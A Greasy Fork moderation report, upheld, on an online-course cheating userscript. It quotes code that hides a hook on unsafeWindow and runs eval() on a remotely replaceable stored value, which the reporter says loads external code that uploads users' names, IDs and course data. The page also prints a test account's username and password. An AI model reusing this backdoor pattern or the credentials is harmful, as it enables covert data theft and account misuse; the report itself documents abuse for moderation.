Greasy Fork is available in English.

FCQ网课通助手[全网题库][通用智能适配答题][刷课] was reported 28-07-2024 for Disallowed external code

The reporter said:

在第911行
At line 911:

function opeationUi(menu) {
   this.fcq_xm_answer = null;
   this.$ = $;
   this.menu = menu;
   this.xm_window=window
   this.initMenu();
   this.config = {}
   unsafeWindow.mainProcedure=this
   window.mainProcedure=this
   return this;
}

这个函数通过把window赋值到xm_window,然后把this赋值到unsafeWindow,隐蔽的将this设置到原网页的mainProcedure上,然后通过window.mainProcedure.xm_window.GM_setValue这个函数,由前端调用动态代码
This function assigns the window to xm_window and then assigns this to unsafeWindow, covertly setting this to the original webpage's mainProcedure. Then, using window.mainProcedure.xm_window.GM_setValue, the function allows dynamic code execution to be called from the front end.


具体执行位置为第1531行
The specific execution location is at line 1531:

var initSet=`var VideoSpeed=1`;
if(!GM_getValue('initSet')){
   GM_setValue('initSet',initSet)
};
eval(GM_getValue('initSet'))

这段代码是本应该执行“var initSet=`var VideoSpeed=1`”,但在前端调用gm_setvalue修改后,此值已变为恶意代码,实际代码引用地址为:https://tcb-w644nfbyxrttaih-2cpr71dbf4b7-1304481250.tcloudbaseapp.com/static/js/pages-index-list.b35c5d5a.js,此行为实际上已经违反规定。
经过对此代码进行分析后,此代码会获取用户的姓名、用户id等上传至第三方服务器,并且在后台静默获取所有课程信息,不经过用户允许就上传
This code is supposed to execute var initSet = "var VideoSpeed = 1", but after the front-end call to gm_setvalue modifies it, this value changes to malicious code. The actual code reference URL is: https://tcb-w644nfbyxrttaih-2cpr71dbf4b7-1304481250.tcloudbaseapp.com/static/js/pages-index-list.b35c5d5a.js. This behavior indeed violates regulations.

After analyzing this code, it is found that it obtains the user's name, user ID, and other information, uploading it to a third-party server. Additionally, it silently collects all course information in the background and uploads it without the user's consent.

请解释原因
please explain

Testwebsite: https://i.mooc.chaoxing.com/
TestUserName and TestPassword: 15637670952 wdm20020810

webstudyقال:
The evidence provided is that additional functionality has been added, which the script does not have

This script has been updated since the report was filed.

This script has had 3 previous upheld or fixed reports.

webstudy (the reported user) has made:

This report has been upheld by a moderator.

the script has functionality to run eval() on unknown external code